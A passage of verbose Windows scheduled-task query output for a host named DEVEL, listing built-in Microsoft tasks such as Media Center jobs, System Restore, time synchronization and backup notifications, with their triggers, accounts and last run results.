Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RecordingRestart
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehrec /RestartRecording
Start In:                             N/A
Comment:                              Restarts recordings after a power failure.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RegisterSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Search registration job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ReindexSearchRoot
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\SqlLiteRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Data Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\UpdateRecordPath
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recorder Permission setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MemoryDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MobilePC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MobilePC\HotStart
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Launches applications configured for Windows HotStart
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MUI
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MUI\LPRemove
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:16:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\lpremove.exe
Start In:                             N/A
Comment:                              Launch language cleanup tool
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 10 minutes Stop the task if Idle State end
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 09:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Multimedia
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Multimedia\SystemSoundsService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              System Sounds User Mode Agent
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\NetTrace
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs
Start In:                             $(Arg1)
Comment:                              Network information collector
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Offline Files
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Background Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task controls periodic background synchronization of Offline Files when the user is working in an offline mode.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        6 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Logon Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task initiates synchronization of Offline Files when a user logs onto the system.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
Next Run Time:                        24/9/2019 7:25:41
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:10:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\powercfg.exe -energy -auto
Start In:                             N/A
Comment:                              This job analyzes the system looking for conditions that may cause high energy use.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 5 minutes, If Not Idle Retry For 120 minutes
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 00:05:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           6:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 Every 14 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\RAC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:12:49
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:07:44
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           31/3/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        1 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Shell
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControls
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Notifications for actions taken by Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Shell\WindowsParentalControlsMigration
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:03
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Migration for Windows Parental Controls.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SideShow
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\AutoWake
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task automatically wakes the computer and then puts it to sleep when automatic wake is turned on for a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\GadgetManager
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages and synchronizes metadata for the installed gadgets on a Windows SideShow-compatible device.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SessionAgent
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:17:56
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task manages the session behavior when multiple user accounts exist on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SideShow\SystemDataProviders
Next Run Time:                        Disabled
Status:                               Could not start
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 4:18:11
Last Result:                          -2147023729
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task provides system data for the clock, power source, wireless network strength, and volume on a Windows SideShow-compatible device.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\SystemRestore
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           12:00:00
Start Date:                           14/6/2005
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\SystemRestore\SR
Next Run Time:                        15/9/2019 12:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
Start In:                             N/A
Comment:                              This task creates regular system protection points.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 1380 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Tcpip
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Tcpip\IpAddressConflict2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
Start In:                             N/A
Comment:                              This event is triggered when an IP address conflict is detected.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\TextServicesFramework
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              TextServicesFramework monitor task
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Time Synchronization
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Time Synchronization\SynchronizeTime
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\sc.exe start w32time task_started
Start In:                             N/A
Comment:                              Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Windows Error Reporting
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Error Reporting\QueueReporting
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        18/3/2017 1:08:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\wermgr.exe -queuereporting
Start In:                             N/A
Comment:                              Windows Error Reporting task to process queued reports.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Filtering Platform
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Start In:                             N/A
Comment:                              This task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Windows Media Sharing
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
Start In:                             N/A
Comment:                              This task updates the cached list of folders and the security permissions on any new files in a user?s shared media library.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\WindowsBackup
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsBackup\ConfigNotification
Next Run Time:                        14/9/2019 10:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Start In:                             N/A
Comment:                              This scheduled task notifies the user that Windows Backup has not been configured.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           10:00:00
Start Date:                           24/3/2017
End Date:                             N/A
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\WindowsColorSystem
HostName:                             DEVEL
